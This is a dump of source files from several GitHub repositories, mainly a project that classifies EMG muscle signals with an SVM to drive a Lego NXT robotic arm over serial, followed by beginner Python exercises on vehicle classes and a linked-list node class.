delimiter=\",\")\r\nds5g8 = np.loadtxt(s5g8, delimiter=\",\")\r\n##################################################################\r\n\r\n# Creating y lists for the classification for every session and every gesture\r\n#session 1 gestures y matrices\r\nys1g0=[0 for i in range(len(ds1g0))]\r\nys1g1=[1 for i in range(len(ds1g1))]\r\nys1g2=[2 for i in range(len(ds1g2))]\r\nys1g3=[3 for i in range(len(ds1g3))]\r\nys1g4=[4 for i in range(len(ds1g4))]\r\nys1g5=[5 for i in range(len(ds1g5))]\r\nys1g6=[6 for i in range(len(ds1g6))]\r\nys1g7=[7 for i in range(len(ds1g7))]\r\nys1g8=[8 for i in range(len(ds1g8))]\r\n\r\n#session 2 gestures y matrices\r\nys2g0=[0 for i in range(len(ds2g0))]\r\nys2g1=[1 for i in range(len(ds2g1))]\r\nys2g2=[2 for i in range(len(ds2g2))]\r\nys2g3=[3 for i in range(len(ds2g3))]\r\nys2g4=[4 for i in range(len(ds2g4))]\r\nys2g5=[5 for i in range(len(ds2g5))]\r\nys2g6=[6 for i in range(len(ds2g6))]\r\nys2g7=[7 for i in range(len(ds2g7))]\r\nys2g8=[8 for i in range(len(ds2g8))]\r\n\r\n#session 3 gestures y matrices\r\nys3g0=[0 for i in range(len(ds3g0))]\r\nys3g1=[1 for i in range(len(ds3g1))]\r\nys3g2=[2 for i in range(len(ds3g2))]\r\nys3g3=[3 for i in range(len(ds3g3))]\r\nys3g4=[4 for i in range(len(ds3g4))]\r\nys3g5=[5 for i in range(len(ds3g5))]\r\nys3g6=[6 for i in range(len(ds3g6))]\r\nys3g7=[7 for i in range(len(ds3g7))]\r\nys3g8=[8 for i in range(len(ds3g8))]\r\n\r\n#session 4 gestures y matrices\r\nys4g0=[0 for i in range(len(ds4g0))]\r\nys4g1=[1 for i in range(len(ds4g1))]\r\nys4g2=[2 for i in range(len(ds4g2))]\r\nys4g3=[3 for i in range(len(ds4g3))]\r\nys4g4=[4 for i in range(len(ds4g4))]\r\nys4g5=[5 for i in range(len(ds4g5))]\r\nys4g6=[6 for i in range(len(ds4g6))]\r\nys4g7=[7 for i in range(len(ds4g7))]\r\nys4g8=[8 for i in range(len(ds4g8))]\r\n\r\n#session 5 gestures y matrices\r\nys5g0=[0 for i in range(len(ds5g0))]\r\nys5g1=[1 for i in range(len(ds5g1))]\r\nys5g2=[2 for i in range(len(ds5g2))]\r\nys5g3=[3 for i in range(len(ds5g3))]\r\nys5g4=[4 for i in range(len(ds5g4))]\r\nys5g5=[5 for i in range(len(ds5g5))]\r\nys5g6=[6 for i in range(len(ds5g6))]\r\nys5g7=[7 for i in range(len(ds5g7))]\r\nys5g8=[8 for i in range(len(ds5g8))]\r\n\r\n#creating a complete dataset with y matrices for every session. \r\n#session 1\r\nds1=np.concatenate((ds1g0,ds1g3,ds1g4,ds1g6,ds1g8))\r\nys1=np.concatenate((ys1g0,ys1g3,ys1g4,ys1g6,ys1g8))\r\n\r\n#session 2\r\nds2=np.concatenate((ds2g0,ds2g3,ds2g4,ds2g6,ds2g8))\r\nys2=np.concatenate((ys2g0,ys2g3,ys2g4,ys2g6,ys2g8))\r\n\r\n#session 3\r\nds3=np.concatenate((ds3g0,ds3g3,ds3g4,ds3g6,ds3g8))\r\nys3=np.concatenate((ys3g0,ys3g3,ys3g4,ys3g6,ys3g8))\r\n\r\n#session 4\r\nds4=np.concatenate((ds4g0,ds4g3,ds4g4,ds4g6,ds4g8))\r\nys4=np.concatenate((ys4g0,ys4g3,ys4g4,ys4g6,ys4g8))\r\n\r\n#session 5\r\nds5=np.concatenate((ds5g0,ds5g3,ds5g4,ds5g6,ds5g8))\r\nys5=np.concatenate((ys5g0,ys5g3,ys5g4,ys5g6,ys5g8))\r\n\r\n#Creating the input for SVM. Complete data (x matrix) and y matrices.\r\ndatall=np.concatenate((ds1,ds2,ds3,ds4,ds5))\r\nysall=np.concatenate((ys1,ys2,ys3,ys4,ys5))\r\n# =============================================================================\r\n# \r\n# =============================================================================\r\n\r\n#selecting sessions for training\r\ndata=datall\r\ny=ysall\r\n#selecting testing session\r\n\r\nmeanvals=np.mean(data,0)\r\nstds=np.std(data,0)\r\nprint (meanvals)\r\nprint(stds)\r\n\r\nX_train, X_test, y_train, y_test = train_test_split(data, y, test_size=0.3, random_state=0)\r\nscaler = preprocessing.StandardScaler().fit(X_train)\r\nX_train_transformed = scaler.transform(X_train)\r\nX_test_transformed = scaler.transform(X_test)\r\n\r\n\r\n\r\n# Split the dataset in two equal parts\r\n# =============================================================================\r\n# X_train, X_test, y_train, y_test = train_test_split(\r\n# data, y, test_size=0.2, random_state=0)\r\n# \r\n# =============================================================================\r\n# Set the parameters by cross-validation\r\ntuned_parameters = [{'kernel': ['rbf'], 'gamma': [2**(3),2**(2),2**(1),2**(0),2**(-1), 2**(-2),2**(-3),2**(-4),2**(-5)],\r\n 'C': [2**(-10),2**(-9),2**(-8),2**(-7),2**(-6), 2**(-5),2**(-4),2**(-3),2**(-2),2**(-1),2**(0),2**(1),2**(2),2**(3), 2**(4),2**(5),2**(6),2**(7),2**(8),2**(9),2**(10)]\r\n ,'decision_function_shape':['ovr']},\r\n {'kernel': ['linear'],\r\n 'C': [2**(-10),2**(-9),2**(-8),2**(-7),2**(-6), 2**(-5),2**(-4),2**(-3),2**(-2),2**(-1),2**(0),2**(1),2**(2),2**(3), 2**(4),2**(5),2**(6),2**(7),2**(8),2**(9),2**(10)]\r\n ,'decision_function_shape':['ovr']} ]\r\n\r\nscores = ['recall']\r\n\r\nfor score in scores:\r\n print(\"# Tuning hyper-parameters for %s\" % score)\r\n print()\r\n\r\n clf = GridSearchCV(SVC(), tuned_parameters, cv=5,\r\n scoring='%s_macro' % score)\r\n clf.fit(X_train_transformed, y_train)\r\n\r\n print(\"Best parameters set found on development set:\")\r\n print()\r\n print(clf.best_params_)\r\n print()\r\n print(\"Grid scores on development set:\")\r\n print()\r\n means = clf.cv_results_['mean_test_score']\r\n stds = clf.cv_results_['std_test_score']\r\n for mean, std, params in zip(means, stds, clf.cv_results_['params']):\r\n print(\"%0.3f (+/-%0.03f) for %r\"\r\n % (mean, std * 2, params))\r\n print()\r\n\r\n print(\"Detailed classification report:\")\r\n print()\r\n print(\"The model is trained on the full development set.\")\r\n print(\"The scores are computed on the full evaluation set.\")\r\n print()\r\n y_true, y_pred = y_test, clf.predict(X_test_transformed)\r\n print(classification_report(y_true, y_pred))\r\n print()\r\n\r\n\r\n\r\n\r\n\r\n\r\n" }, { "alpha_fraction": 0.8088170886039734, "alphanum_fraction": 0.8153644800186157, "avg_line_length": 133.76470947265625, "blob_id": "14450feb0d1abc6088c9911e3a147b49a0ae5fa3", "content_id": "a61597dcb41dee7650dfff1d6effe814bf3ccff1", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2291, "license_type": "permissive", "max_line_length": 334, "num_lines": 17, "path": "/README.md", "repo_name": "Kostas-Stratakis/EMG-Control-of-Robotic-Arm", "src_encoding": "UTF-8", "text": "# EMG-Control-of-Robotic-Arm\nThis project 's goal is to control a robotic arm built from lego using EMG signal recorded from a user performing static gestures.\nThe main idea is that, the user performs a number static gestures 10 seconds each and records the signal.\nThese signals are stored to create data-sets. These data-sets are used train an SVM that does the recognition (classification) of each gesture.\nAfter the classification a corresponding command to start or stop a motor is sent to the Lego NXT, which is the microprocessor that controls the motors.\n\nIn this repository, except the Readme and the License files, there are 6 other files. A short description for each one of them follows:\nSignal amplifiers.png: This schematic depicts the analog circuit needed to be built for recording the EMG signal from a pair of muscles of interest.\nPower supply circuit.png: The schematic for powering up the aforementioned circuit.\nMicroprocessor Software: The code running on an STM32 Nucleo board. It samples the signal filters it and then Rms values over a window are sent to a PC. It was developed using Mbed platform and libraries.\nFinding_best_SVM_for_5gestures.py: This python code uses scikit-learn library to train SVMs with different parameters to find the best among them that classifies the gestures correctly. The data-sets needed for the trainig are created by storing the values sent by Microprocessor Software.\nSending_real-time_Commands.py: This python code takes the parameters found from the previous python code and trains and SVM. This SVM receives data (vectors) in real-time and classifies it trying to recognize the gesture the user is doing. Based on the gesture recognized commands are sent via bluetooth to the NXT fro motor control.\nMyoelectric Control of Robotic Arm Msc Thesis.pdf: This document is my diploma thesis. All the details and the knowledge needed for understanding and building this project are included. In the conclusion chapter the inherent dificulties and and the aspects that need more researching are stated and explained.\n\nA video showing real-time operation classifying among 5 gestures and recording from 4 muscles of interest exist in the follwing google drive link:\n\nhttps://drive.google.com/open?id=1bZBQOkEBfMYjs1B4Ci36rJVv6ELplE3P\n" }, { "alpha_fraction": 0.5675817131996155, "alphanum_fraction": 0.6851671934127808, "avg_line_length": 42.705684661865234, "blob_id": "55b97ceee2f6698dd6704046eb2b39b369b4ba02", "content_id": "88364923423bfc1b87a13911e0704b39ecf03aef", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 13369, "license_type": "permissive", "max_line_length": 170, "num_lines": 299, "path": "/Sending_real-time_Commands.py", "repo_name": "Kostas-Stratakis/EMG-Control-of-Robotic-Arm", "src_encoding": "UTF-8", "text": "# In this Python code in line 230 change the parameters C and Gamma to the values found by the other Python code named \"Finding_best_SVM_for_5gestures.py\"\r\n#This code trains the optimal SVM and then it Sends coommands in form of byte streams to the Lego NXT microprocessor so the the motors start and stop moving in real time.\r\n\r\n\r\nimport serial\t\r\nimport time\r\nimport serial\r\nimport numpy as np\r\nimport sys\r\nimport matplotlib.pyplot as plt\r\nfrom sklearn.model_selection import cross_val_score\r\nnp.set_printoptions(threshold=sys.maxsize)\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.model_selection import GridSearchCV\r\nfrom sklearn.metrics import classification_report\r\nfrom sklearn.svm import SVC\r\nfrom sklearn import preprocessing\r\n\r\n#opening the ports to be ready for comms\r\n#ser.__del__()\r\n#serout.__del__()\r\nserout=serial.Serial('COM3', 9600) #com3 bluetooth out for NXT\r\nser=serial.Serial('COM12', 9600) #com9 prolific\r\n\r\n# session 1 loading data to variables lists\r\ns1g0=\"C:/Users/ece73/Desktop/recordings/session1/gesture0.txt\"\r\ns1g1=\"C:/Users/ece73/Desktop/recordings/session1/gesture1.txt\"\r\ns1g2=\"C:/Users/ece73/Desktop/recordings/session1/gesture2.txt\"\r\ns1g3=\"C:/Users/ece73/Desktop/recordings/session1/gesture3.txt\"\r\ns1g4=\"C:/Users/ece73/Desktop/recordings/session1/gesture4.txt\"\r\ns1g5=\"C:/Users/ece73/Desktop/recordings/session1/gesture5.txt\"\r\ns1g6=\"C:/Users/ece73/Desktop/recordings/session1/gesture6.txt\"\r\ns1g7=\"C:/Users/ece73/Desktop/recordings/session1/gesture7.txt\"\r\ns1g8=\"C:/Users/ece73/Desktop/recordings/session1/gesture8.txt\"\r\n\r\nds1g0 = np.loadtxt(s1g0, delimiter=\",\")\r\nds1g1 = np.loadtxt(s1g1, delimiter=\",\")\r\nds1g2 = np.loadtxt(s1g2, delimiter=\",\")\r\nds1g3 = np.loadtxt(s1g3, delimiter=\",\")\r\nds1g4 = np.loadtxt(s1g4, delimiter=\",\")\r\nds1g5 = np.loadtxt(s1g5, delimiter=\",\")\r\nds1g6 = np.loadtxt(s1g6, delimiter=\",\")\r\nds1g7 = np.loadtxt(s1g7, delimiter=\",\")\r\nds1g8 = np.loadtxt(s1g8, delimiter=\",\")\r\n###################################################\r\n\r\n# session 2 loading data to variables lists\r\ns2g0=\"C:/Users/ece73/Desktop/recordings/session2/gesture0.txt\"\r\ns2g1=\"C:/Users/ece73/Desktop/recordings/session2/gesture1.txt\"\r\ns2g2=\"C:/Users/ece73/Desktop/recordings/session2/gesture2.txt\"\r\ns2g3=\"C:/Users/ece73/Desktop/recordings/session2/gesture3.txt\"\r\ns2g4=\"C:/Users/ece73/Desktop/recordings/session2/gesture4.txt\"\r\ns2g5=\"C:/Users/ece73/Desktop/recordings/session2/gesture5.txt\"\r\ns2g6=\"C:/Users/ece73/Desktop/recordings/session2/gesture6.txt\"\r\ns2g7=\"C:/Users/ece73/Desktop/recordings/session2/gesture7.txt\"\r\ns2g8=\"C:/Users/ece73/Desktop/recordings/session2/gesture8.txt\"\r\n\r\nds2g0 = np.loadtxt(s2g0, delimiter=\",\")\r\nds2g1 = np.loadtxt(s2g1, delimiter=\",\")\r\nds2g2 = np.loadtxt(s2g2, delimiter=\",\")\r\nds2g3 = np.loadtxt(s2g3, delimiter=\",\")\r\nds2g4 = np.loadtxt(s2g4, delimiter=\",\")\r\nds2g5 = np.loadtxt(s2g5, delimiter=\",\")\r\nds2g6 = np.loadtxt(s2g6, delimiter=\",\")\r\nds2g7 = np.loadtxt(s2g7, delimiter=\",\")\r\nds2g8 = np.loadtxt(s2g8, delimiter=\",\")\r\n##################################################################\r\n\r\n# session 3 loading data to variables lists\r\ns3g0=\"C:/Users/ece73/Desktop/recordings/session3/gesture0.txt\"\r\ns3g1=\"C:/Users/ece73/Desktop/recordings/session3/gesture1.txt\"\r\ns3g2=\"C:/Users/ece73/Desktop/recordings/session3/gesture2.txt\"\r\ns3g3=\"C:/Users/ece73/Desktop/recordings/session3/gesture3.txt\"\r\ns3g4=\"C:/Users/ece73/Desktop/recordings/session3/gesture4.txt\"\r\ns3g5=\"C:/Users/ece73/Desktop/recordings/session3/gesture5.txt\"\r\ns3g6=\"C:/Users/ece73/Desktop/recordings/session3/gesture6.txt\"\r\ns3g7=\"C:/Users/ece73/Desktop/recordings/session3/gesture7.txt\"\r\ns3g8=\"C:/Users/ece73/Desktop/recordings/session3/gesture8.txt\"\r\n\r\nds3g0 = np.loadtxt(s3g0, delimiter=\",\")\r\nds3g1 = np.loadtxt(s3g1, delimiter=\",\")\r\nds3g2 = np.loadtxt(s3g2, delimiter=\",\")\r\nds3g3 = np.loadtxt(s3g3, delimiter=\",\")\r\nds3g4 = np.loadtxt(s3g4, delimiter=\",\")\r\nds3g5 = np.loadtxt(s3g5, delimiter=\",\")\r\nds3g6 = np.loadtxt(s3g6, delimiter=\",\")\r\nds3g7 = np.loadtxt(s3g7, delimiter=\",\")\r\nds3g8 = np.loadtxt(s3g8, delimiter=\",\")\r\n##################################################################\r\n\r\n# session 4 loading data to variables lists\r\ns4g0=\"C:/Users/ece73/Desktop/recordings/session4/gesture0.txt\"\r\ns4g1=\"C:/Users/ece73/Desktop/recordings/session4/gesture1.txt\"\r\ns4g2=\"C:/Users/ece73/Desktop/recordings/session4/gesture2.txt\"\r\ns4g3=\"C:/Users/ece73/Desktop/recordings/session4/gesture3.txt\"\r\ns4g4=\"C:/Users/ece73/Desktop/recordings/session4/gesture4.txt\"\r\ns4g5=\"C:/Users/ece73/Desktop/recordings/session4/gesture5.txt\"\r\ns4g6=\"C:/Users/ece73/Desktop/recordings/session4/gesture6.txt\"\r\ns4g7=\"C:/Users/ece73/Desktop/recordings/session4/gesture7.txt\"\r\ns4g8=\"C:/Users/ece73/Desktop/recordings/session4/gesture8.txt\"\r\n\r\nds4g0 = np.loadtxt(s4g0, delimiter=\",\")\r\nds4g1 = np.loadtxt(s4g1, delimiter=\",\")\r\nds4g2 = np.loadtxt(s4g2, delimiter=\",\")\r\nds4g3 = np.loadtxt(s4g3, delimiter=\",\")\r\nds4g4 = np.loadtxt(s4g4, delimiter=\",\")\r\nds4g5 = np.loadtxt(s4g5, delimiter=\",\")\r\nds4g6 = np.loadtxt(s4g6, delimiter=\",\")\r\nds4g7 = np.loadtxt(s4g7, delimiter=\",\")\r\nds4g8 = np.loadtxt(s4g8, delimiter=\",\")\r\n##################################################################\r\n\r\n# session 5 loading data to variables lists\r\ns5g0=\"C:/Users/ece73/Desktop/recordings/session5/gesture0.txt\"\r\ns5g1=\"C:/Users/ece73/Desktop/recordings/session5/gesture1.txt\"\r\ns5g2=\"C:/Users/ece73/Desktop/recordings/session5/gesture2.txt\"\r\ns5g3=\"C:/Users/ece73/Desktop/recordings/session5/gesture3.txt\"\r\ns5g4=\"C:/Users/ece73/Desktop/recordings/session5/gesture4.txt\"\r\ns5g5=\"C:/Users/ece73/Desktop/recordings/session5/gesture5.txt\"\r\ns5g6=\"C:/Users/ece73/Desktop/recordings/session5/gesture6.txt\"\r\ns5g7=\"C:/Users/ece73/Desktop/recordings/session5/gesture7.txt\"\r\ns5g8=\"C:/Users/ece73/Desktop/recordings/session5/gesture8.txt\"\r\n\r\nds5g0 = np.loadtxt(s5g0, delimiter=\",\")\r\nds5g1 = np.loadtxt(s5g1, delimiter=\",\")\r\nds5g2 = np.loadtxt(s5g2, delimiter=\",\")\r\nds5g3 = np.loadtxt(s5g3, delimiter=\",\")\r\nds5g4 = np.loadtxt(s5g4, delimiter=\",\")\r\nds5g5 = np.loadtxt(s5g5, delimiter=\",\")\r\nds5g6 = np.loadtxt(s5g6, delimiter=\",\")\r\nds5g7 = np.loadtxt(s5g7, delimiter=\",\")\r\nds5g8 = np.loadtxt(s5g8, delimiter=\",\")\r\n##################################################################\r\n\r\n# Creating y lists for the classification for every session and every gesture\r\n#session 1 gestures y matrices\r\nys1g0=[0 for i in range(len(ds1g0))]\r\nys1g1=[1 for i in range(len(ds1g1))]\r\nys1g2=[2 for i in range(len(ds1g2))]\r\nys1g3=[3 for i in range(len(ds1g3))]\r\nys1g4=[4 for i in range(len(ds1g4))]\r\nys1g5=[5 for i in range(len(ds1g5))]\r\nys1g6=[6 for i in range(len(ds1g6))]\r\nys1g7=[7 for i in range(len(ds1g7))]\r\nys1g8=[8 for i in range(len(ds1g8))]\r\n\r\n#session 2 gestures y matrices\r\nys2g0=[0 for i in range(len(ds2g0))]\r\nys2g1=[1 for i in range(len(ds2g1))]\r\nys2g2=[2 for i in range(len(ds2g2))]\r\nys2g3=[3 for i in range(len(ds2g3))]\r\nys2g4=[4 for i in range(len(ds2g4))]\r\nys2g5=[5 for i in range(len(ds2g5))]\r\nys2g6=[6 for i in range(len(ds2g6))]\r\nys2g7=[7 for i in range(len(ds2g7))]\r\nys2g8=[8 for i in range(len(ds2g8))]\r\n\r\n#session 3 gestures y matrices\r\nys3g0=[0 for i in range(len(ds3g0))]\r\nys3g1=[1 for i in range(len(ds3g1))]\r\nys3g2=[2 for i in range(len(ds3g2))]\r\nys3g3=[3 for i in range(len(ds3g3))]\r\nys3g4=[4 for i in range(len(ds3g4))]\r\nys3g5=[5 for i in range(len(ds3g5))]\r\nys3g6=[6 for i in range(len(ds3g6))]\r\nys3g7=[7 for i in range(len(ds3g7))]\r\nys3g8=[8 for i in range(len(ds3g8))]\r\n\r\n#session 4 gestures y matrices\r\nys4g0=[0 for i in range(len(ds4g0))]\r\nys4g1=[1 for i in range(len(ds4g1))]\r\nys4g2=[2 for i in range(len(ds4g2))]\r\nys4g3=[3 for i in range(len(ds4g3))]\r\nys4g4=[4 for i in range(len(ds4g4))]\r\nys4g5=[5 for i in range(len(ds4g5))]\r\nys4g6=[6 for i in range(len(ds4g6))]\r\nys4g7=[7 for i in range(len(ds4g7))]\r\nys4g8=[8 for i in range(len(ds4g8))]\r\n\r\n#session 5 gestures y matrices\r\nys5g0=[0 for i in range(len(ds5g0))]\r\nys5g1=[1 for i in range(len(ds5g1))]\r\nys5g2=[2 for i in range(len(ds5g2))]\r\nys5g3=[3 for i in range(len(ds5g3))]\r\nys5g4=[4 for i in range(len(ds5g4))]\r\nys5g5=[5 for i in range(len(ds5g5))]\r\nys5g6=[6 for i in range(len(ds5g6))]\r\nys5g7=[7 for i in range(len(ds5g7))]\r\nys5g8=[8 for i in range(len(ds5g8))]\r\n\r\n#creating a complete dataset with y matrices for every session. \r\n#session 1\r\nds1=np.concatenate((ds1g0,ds1g3,ds1g4,ds1g6,ds1g8))\r\nys1=np.concatenate((ys1g0,ys1g3,ys1g4,ys1g6,ys1g8))\r\n\r\n#session 2\r\nds2=np.concatenate((ds2g0,ds2g3,ds2g4,ds2g6,ds2g8))\r\nys2=np.concatenate((ys2g0,ys2g3,ys2g4,ys2g6,ys2g8))\r\n\r\n#session 3\r\nds3=np.concatenate((ds3g0,ds3g3,ds3g4,ds3g6,ds3g8))\r\nys3=np.concatenate((ys3g0,ys3g3,ys3g4,ys3g6,ys3g8))\r\n\r\n#session 4\r\nds4=np.concatenate((ds4g0,ds4g3,ds4g4,ds4g6,ds4g8))\r\nys4=np.concatenate((ys4g0,ys4g3,ys4g4,ys4g6,ys4g8))\r\n\r\n#session 5\r\nds5=np.concatenate((ds5g0,ds5g3,ds5g4,ds5g6,ds5g8))\r\nys5=np.concatenate((ys5g0,ys5g3,ys5g4,ys5g6,ys5g8))\r\n\r\n#Creating the input for SVM. Complete data (x matrix) and y matrices.\r\ndatall=np.concatenate((ds1,ds2,ds3,ds4,ds5))\r\nysall=np.concatenate((ys1,ys2,ys3,ys4,ys5))\r\n\r\ndata=datall\r\ny=ysall\r\n\r\n#splitting training and testng set randomly\r\n\r\n\r\n#scaling the data sets \r\nX_train, X_test, y_train, y_test = train_test_split(data, y, test_size=0.2, random_state=0)\r\nscaler = preprocessing.StandardScaler().fit(X_train)\r\nX_train_transformed = scaler.transform(X_train)\r\nX_test_transformed = scaler.transform(X_test)\r\n\r\n#SVM model traing and and testing the test set on it printing the results \r\n#care for the parameters they are taken from previous recordings\r\nmodel = SVC(kernel='rbf', C=512,gamma=0.125,decision_function_shape='ovr')\r\nmodel.fit(X_train_transformed,y_train)\r\ny_true, y_pred = y_test, model.predict(X_test_transformed)\r\nprint(classification_report(y_true, y_pred))\r\nprint('model trained')\r\n\r\n\r\n#reading rms vectors from microprocessors and deciding what the Nxt will do\r\n#5th byte is the motor\r\n#start motor on port A, 0x0D, 0x00, 0x80, 0x04, 0x00, 0x64, 0x07, 0x00, 0x00, 0x20, 0x00, 0x00, 0x00, 0x00, 0x00\r\n#start motor on port B, 0x0D, 0x00, 0x80, 0x04, 0x01, 0x64, 0x07, 0x00, 0x00, 0x20, 0x00, 0x00, 0x00, 0x00, 0x00\r\n#start motor on port C, 0x0D, 0x00, 0x80, 0x04, 0x02, 0x64, 0x07, 0x00, 0x00, 0x20, 0x00, 0x00, 0x00, 0x00, 0x00\r\n#Stop motor on port A, 0x0C, 0x00, 0x00, 0x04, 0x00, 0x00, 0x07, 0x00, 0x00, 0x20, 0x00, 0x00, 0x00, 0x00\r\n#Stop motor on port B, 0x0C, 0x00, 0x00, 0x04, 0x01, 0x00, 0x07, 0x00, 0x00, 0x20, 0x00, 0x00, 0x00, 0x00\r\n#Stop motor on port C, 0x0C, 0x00, 0x00, 0x04, 0x02, 0x00, 0x07, 0x00, 0x00, 0x20, 0x00, 0x00, 0x00, 0x00\r\n#6th byte 0x64 for 50% power for anticlockwise direction and 0xCD for clockwise\r\n\r\nwhile True:\r\n x = ser.readline() #reading a series of bytes\r\n g=x.decode(\"ascii\") #decoding the byte to string\r\n g = np.fromstring( g, dtype=np.float, sep=',' ) #changing the string to an array of floats\r\n g=np.reshape(g,(1,-1)) #reshaping to 2d array \r\n print(g)\r\n g_transformed=scaler.transform(g) #normalizing vector with params from training set\r\n y_predg=model.predict(g_transformed) #predicting which gesture this is\r\n print(y_predg) #printing prediction for me to know\r\n \r\n #If gesture0 detected stop all motor movements\r\n if y_predg==0:\r\n #stop port A\r\n packet = bytearray([ 0x0C, 0x00, 0x00, 0x04, 0x00, 0x00, 0x07, 0x00, 0x00, 0x20, 0x00, 0x00, 0x00, 0x00])\r\n serout.write(packet)\r\n #stop port B\r\n packet = bytearray([ 0x0C, 0x00, 0x00, 0x04, 0x01, 0x00, 0x07, 0x00, 0x00, 0x20, 0x00, 0x00, 0x00, 0x00])\r\n serout.write(packet)\r\n #stop port C\r\n packet = bytearray([ 0x0C, 0x00, 0x00, 0x04, 0x02, 0x00, 0x07, 0x00, 0x00, 0x20, 0x00, 0x00, 0x00, 0x00])\r\n serout.write(packet)\r\n #if gesture 3 detected open hand\r\n if y_predg==3:\r\n #start port A anticlockwise\r\n packet = bytearray([ 0x0D, 0x00, 0x80, 0x04, 0x00, 0x32, 0x07, 0x00, 0x00, 0x20, 0x00, 0x00, 0x00, 0x00, 0x00])\r\n serout.write(packet)\r\n #stop port B\r\n packet = bytearray([ 0x0C, 0x00, 0x00, 0x04, 0x01, 0x00, 0x07, 0x00, 0x00, 0x20, 0x00, 0x00, 0x00, 0x00])\r\n serout.write(packet)\r\n #if gesture 4 detected close hand\r\n if y_predg==4:\r\n #start port A anticlockwise\r\n packet = bytearray([ 0x0D, 0x00, 0x80, 0x04, 0x00, 0xCD, 0x07, 0x00, 0x00, 0x20, 0x00, 0x00, 0x00, 0x00, 0x00])\r\n serout.write(packet)\r\n #stop port B\r\n packet = bytearray([ 0x0C, 0x00, 0x00, 0x04, 0x01, 0x00, 0x07, 0x00, 0x00, 0x20, 0x00, 0x00, 0x00, 0x00])\r\n serout.write(packet)\r\n #if gesture 6 detected go up \r\n if y_predg==6:\r\n #start port B clockwise\r\n packet = bytearray([ 0x0D, 0x00, 0x80, 0x04, 0x01, 0x32, 0x07, 0x00, 0x00, 0x20, 0x00, 0x00, 0x00, 0x00, 0x00])\r\n serout.write(packet)\r\n #stop port A\r\n packet = bytearray([ 0x0C, 0x00, 0x00, 0x04, 0x00, 0x00, 0x07, 0x00, 0x00, 0x20, 0x00, 0x00, 0x00, 0x00])\r\n serout.write(packet)\r\n #if gesture 8 detected go down \r\n if y_predg==8:\r\n #start port B anticlockwise\r\n packet = bytearray([ 0x0D, 0x00, 0x80, 0x04, 0x01, 0xCD, 0x07, 0x00, 0x00, 0x20, 0x00, 0x00, 0x00, 0x00, 0x00])\r\n serout.write(packet)\r\n #stop port A\r\n packet = bytearray([ 0x0C, 0x00, 0x00, 0x04, 0x00, 0x00, 0x07, 0x00, 0x00, 0x20, 0x00, 0x00, 0x00, 0x00])\r\n serout.write(packet)\r\n\r\n" } ]
4
vmms16/Linguagens-de-programa-o
https://github.com/vmms16/Linguagens-de-programa-o
0eb583a7aa647c47f95f114c640a7f8fdb419200
b538e3687dfb4cda70d37294ce8d61cf71859063
cd9bc078529a20a44eba7ffc03fd592a33afe983
refs/heads/master
2020-03-12T18:34:13.114198
2018-04-26T11:18:38
2018-04-26T11:18:38
130,763,594
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.4112149477005005, "alphanum_fraction": 0.4252336323261261, "avg_line_length": 29.571428298950195, "blob_id": "a47848d3fcb25713ffce09461cb2782eaca61036", "content_id": "9ba238fff7715aae6d2ff32d820a440202b79a2c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 428, "license_type": "no_license", "max_line_length": 73, "num_lines": 14, "path": "/Entrega 1/Exercicio-2-Estruturado - Vinicius Mateus Mendonça da Silva.py", "repo_name": "vmms16/Linguagens-de-programa-o", "src_encoding": "UTF-8", "text": "while True:\n print(\"____________________________________________________\")\n veiculo=input(\"Qual o tipo do seu veiculo?\\n1-Carro\\n2-Moto\\nTipo: \")\n\n if veiculo==str(1):\n print(\"Seu carro tem 4 rodas\")\n break\n elif veiculo==str(2):\n print(\"Sua moto tem 2 rodas\")\n break\n else:\n print(\"Indique um veiculo valido\")\n\n print(\"____________________________________________________\")\n" }, { "alpha_fraction": 0.48493149876594543, "alphanum_fraction": 0.4904109537601471, "avg_line_length": 23.909090042114258, "blob_id": "e5457f3f840593e3ebdc42bb9984276954439f5c", "content_id": "d4b2dcffff536a9b9b8a8dd728862869ca97d3a0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1095, "license_type": "no_license", "max_line_length": 79, "num_lines": 44, "path": "/Entrega 1/Execicio-2-OO - Vinicius Mateus Mendonça da Silva.py", "repo_name": "vmms16/Linguagens-de-programa-o", "src_encoding": "UTF-8", "text": "class Veiculo:\n def __init__(self):\n self._numero_rodas=None\n\n def getNumeroRodas(self):\n return self._numero_rodas\n\n def setNumeroRodas(self, quantidade):\n self._numero_rodas=quantidade\n\n def printNumeroRodas(self):\n print(\"Seu veiculo tem %d roas\"%(self._numero_rodas))\n\nclass Carro(Veiculo):\n def __init__(self):\n Veiculo.__init__(self)\n self._numero_rodas=4\n\nclass Moto(Veiculo):\n def __init__(self):\n Veiculo.__init__(self)\n self._numero_rodas=2\n\n\ndef main():\n while True:\n print(\"____________________________________________________\")\n veiculo = input(\"Qual o tipo do seu veiculo?\\n1-Carro\\n2-Moto\\nTipo: \")\n\n if veiculo == str(1):\n carro=Carro()\n carro.printNumeroRodas()\n break\n elif veiculo == str(2):\n moto=Moto()\n moto.printNumeroRodas()\n break\n else:\n print(\"Indique um veiculo valido\")\n\n print(\"____________________________________________________\")\n\nif __name__==\"__main__\":\n main()" } ]
2
kkasra12/pythonClass981
https://github.com/kkasra12/pythonClass981
f5bd99b0bb757aaf32f279758778f2d7855b7323
f74d44242c343d82940deaa82280aceaa2b693b7
093888768bb18164e0cbd85aa63b0edaedb4fabf
refs/heads/master
2021-07-11T11:59:43.862034
2020-11-30T15:44:56
2020-11-30T15:44:56
225,092,556
3
0
null
null
null
null
null
[ { "alpha_fraction": 0.5870206356048584, "alphanum_fraction": 0.5946902632713318, "avg_line_length": 29.81818199157715, "blob_id": "15abf76136a1dabda91644ff50de98fb361b772d", "content_id": "6a74b9da9ef1e0fe69dff28d97f028bff394e33c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1695, "license_type": "no_license", "max_line_length": 58, "num_lines": 55, "path": "/Session9/Q0.py", "repo_name": "kkasra12/pythonClass981", "src_encoding": "UTF-8", "text": "class node:\n def __init__(self,data):\n self.data=data\n self.next=None\n self.previous=None\n def setNext(self,nextNode):\n if type(nextNode)!=type(self):\n raise Exception(\"nextNode is not node!!!\")\n self.next=nextNode\n nextNode.previous=self\n def setPrevious(self,previousNode):\n if type(previousNode)!=type(self):\n raise 